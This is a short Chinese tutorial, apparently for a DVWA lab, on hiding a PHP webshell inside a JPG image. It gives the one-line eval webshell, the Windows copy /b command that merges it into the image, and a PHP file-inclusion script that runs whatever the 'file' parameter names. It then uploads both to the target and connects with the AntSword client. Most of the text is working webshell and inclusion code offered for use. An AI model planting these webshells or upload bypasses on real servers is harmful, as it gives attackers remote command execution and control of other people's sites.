- 首先准备一个图片,还有一个脚本,这里的php文件就采用了最简单的一句话木马,具体内容为<?php @eval($_POST['a']);?>,确保两个文件在同一个路径下。
2.紧着着按住shift键,然后点击鼠标右键,这时候就会出现“在此处打开powershell”的字眼,点击 进入蓝色窗口,其实我们想通过这样来进入cmd,所以我们用命令start cmd;
进入
3.在cmd中输入copy shell.jpg /b+txt.php/a jshell.jpg
-b是指以二进制的方式合并复制文件,用于图像影音类文件
-a是指以ascii方式合并复制文件,用于文本类文件
然后发现在原来的路径中已经生成了我们想要的文件
4.在靶机环境中上传我们的文件,上传成功会爆路径复制路径到url打开
5.但光是上传上去仍然不够,我们还需要一个脚本来执行我们的文件。
<?php
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
include $file;
}else{
show_source(__file__);
}
?>
上传方式有多种,这里我就将dvwa开最低直接传上去了然后我们把爆出来的地址复制到url上最后我们利用file参数将我们之前上传的jshell.jpg文件匹配进去
http://192.168.132.188/DVWA/hackable/uploads/include.php?file=jshell.jpg
6.然后我们开蚁剑进行配置连接,将本网页的url复制进去可以进目录